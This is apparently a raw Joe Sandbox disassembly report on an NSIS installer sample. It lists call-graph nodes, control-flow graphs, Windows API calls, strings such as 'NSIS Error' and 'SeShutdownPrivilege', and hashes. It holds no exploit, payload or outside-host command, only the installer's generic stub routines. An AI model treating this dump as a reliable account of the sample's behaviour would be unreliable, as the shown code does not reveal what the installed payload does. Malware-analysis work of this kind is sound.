GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                          • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                            • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426579,762323A0,00000000), ref: 00406902
                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                          • ShowWindow.USER32(00000000), ref: 00405313
                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                          • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                          • CreatePopupMenu.USER32 ref: 004053A2
                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                          • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                          • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                          • EmptyClipboard.USER32 ref: 0040543D
                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                          • CloseClipboard.USER32 ref: 0040549A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                          • String ID: New install of "%s" to "%s"${
                                                                                          • API String ID: 2110491804-1641061399
                                                                                          • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                          • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                          • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                          • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                          APIs
                                                                                          • #17.COMCTL32 ref: 004038CE
                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                          • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                          • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                          • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                          • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                          • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                          • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                          • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                          • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                          • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                          • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                          • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                          • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                          • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                          • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                          • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                          • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                          • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                          • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                          • API String ID: 2435955865-3712954417
                                                                                          • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
